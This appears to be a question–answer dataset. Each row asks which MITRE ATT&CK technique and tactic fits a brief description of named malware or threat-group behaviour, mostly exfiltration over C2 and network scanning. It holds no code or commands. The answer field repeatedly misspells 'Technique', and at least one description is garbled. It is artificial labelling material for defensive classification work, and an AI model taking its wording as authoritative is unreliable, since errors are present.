+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has sent user and system information to a C2 server via HTTP POST requests.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT has exfiltrated data over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook can upload files from a victim's machine over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot exfiltrates data over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has added the exfiltrated data to the URL over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon uploads files and data from a compromised host over the existing C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can send collected data in JSON format to C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CallMe exfiltrates data to its C2 server over the same protocol as C2 communications.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon exfiltrates collected data over email via SMTP/S and POP3/S C2 channels.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has exfiltrated data via HTTP to already established C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell can upload files over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can exfiltrate collected data via C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepySnail can connect to C2 for data exfiltration.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can exfiltrate stolen information over its C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch can exfiltrate data over the primary C2 channel (Dropbox HTTP API).,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink has the ability to upload exfiltrated files to a C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate uses existing command and control channels to retrieve captured cryptocurrency wallet credentials.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DnsSystem can exfiltrate collected data to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has used Ngrok to establish C2 and exfiltrate data.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub can exfiltrate files over C2 infrastructure.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky has exfiltrated data to the C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has the ability to send information staged on a compromised host externally to C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can upload files over the C2 channel from the infected host.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury can exfiltrate SSH credentials through custom DNS queries.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has exfiltrated data over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can send data gathered from a target through the command and control channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has exfiltrated data to the C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy has sent data collected from a compromised host to its C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can remotely exfiltrate sensitive information from a compromised AD FS server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can execute commands, including gathering user information, and send the results to C2.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax can exfiltrate files over the existing C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy has exfiltrated host environment information to an external C2 domain via port 9006.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to exfiltrate data over the Microsoft Outlook C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can send data it retrieves to the C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent has sent data related to a compromise host over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL has sent system information and files over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has used its C2 channel to exfiltrate data.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to download files from the infected host to the command and control (C2) server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple's Multi File Exfiltrator module can exfiltrate multiple files from a compromised host as an HTTP response over C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has uploaded a file containing debugger logs, network information and system information to the C2.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can exfiltrate collected information from the host to the C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has sent data and files to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK has exfiltrated collected data to its C2 via POST requests.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel has exfiltrated information gathered from the infected system to the C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can send data from the victim host through a DNS C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron exfiltrates data over its email C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower can send collected data, including screenshots, over its C2 channel.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa exfiltrates data from a supplied path over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete's collected data is exfiltrated over the same channel used for C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can send network system data and files to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can exfiltrate locally stored data via its C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo can send the data it collects to the C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type has transmitted collected files and data to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat has uploaded files and data to its C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu can sends the collected financial data to the C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MobileOrder exfiltrates data to its C2 server over the same protocol as C2 communications.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall can upload files and information from a compromised host to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETEAGLE is capable of reading files over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can use SMTP and DNS for file exfiltration and C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has uploaded stolen files and data from a victim's machine over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Data exfiltration is done by Okrum using the already opened channel with the C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE can upload files from the victim's machine to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel can upload files from a compromised host over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare can upload files and information from a compromised host to its C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can execute the command code do_upload to send files to C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull has the ability to exfiltrate stolen victim data through its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has exfiltrated data over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc performs data exfiltration over the control server channel using a custom protocol.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Psylo exfiltrates data to its C2 server over the same protocol as C2 communications.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon exfiltrates screenshot files to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can send stolen information to C2 nodes including passwords, accounts, and emails.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can exfiltrate host and malware information to C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can send collected files back over same C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can send data gathered from the infected machine via HTTP POST request to the C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro sends device and other collected data back to the C2 using the established C2 channels over TCP.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type has uploaded data and files from a compromised host to its C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has sent collected data from a compromised host to its C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can transfer files from an infected host to the C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has sent system information to a C2 server via HTTP and HTTPS POST requests.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has exfiltrated data to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE can exfiltrate collected data to its C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP has sent stolen credentials and other data to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can send collected data in JSON format to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco can load a plugin to exfiltrate stolen files to SMB shares also used in C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter sent generated reports to the C2 via HTTP POST requests.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist has exfiltrated data over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can exfiltrate files from the victim using the download command.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has uploaded collected data and files from a compromised host to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark has exfiltrated data over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has exfiltrated victim data using HTTP POST requests to its C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can send data and files from a compromised host to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can exfiltrate collected documents through C2 channels.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet sends compromised victim information via HTTP.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has exfiltrated data over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to send collected files over its C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest exfiltrates targeted file extensions in the /Users/ folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma can send victim data to an actor-controlled C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can send information about the compromised host and upload data to a hardcoded C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used HTTP POSTs to exfil gathered information.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to exfiltrate data over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can send collected victim data to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can exfiltrate files from an infected machine to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET exfiltrates data stolen from a system over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib has sent data and files from a compromised host to its C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy has exfiltrated data to the designated C2 server using HTTP POST requests.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can upload collected files and data to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has used HTTP to receive stolen information from the infected machine.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors used the SoftPerfect Network Scanner for network scanning.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, used RustScan to scan for open ports on targeted ESXi appliances.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During CostaRicto, the threat actors employed nmap and pscan to scan target environments.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has used SMBTouch, a vulnerability scanner, to determine whether a target is vulnerable to EternalBlue malware.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used the SNScan tool to find other potential targets on victim networks.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used the get -b -e -p command for network scanning as well as a custom Python tool packed into a Windows executable named Get.exe to scan IP ranges for HTTP.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya performed port scanning to obtain the list of active services.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized `nmap` for reconnaissance efforts. FIN13 has also scanned for internal MS-SQL servers in a compromised network.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used tools including NMAP to conduct broad scanning to identify open ports.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer scanned network services to search for vulnerabilities in the victim system.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used KPortScan 3.0 to perform SMB, RDP, and LDAP scanning.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has used the LadonGo scanner to scan target networks.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Suckfly the victim's internal network for hosts with ports 8080, 5900, and 40 open.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters. TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors use the Hunter tool to conduct network service discovery for vulnerable systems.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper used pr and an openly available tool to scan for open ports on target systems.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used tcping.exe, similar to Ping, to probe port status on systems of interest.","Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
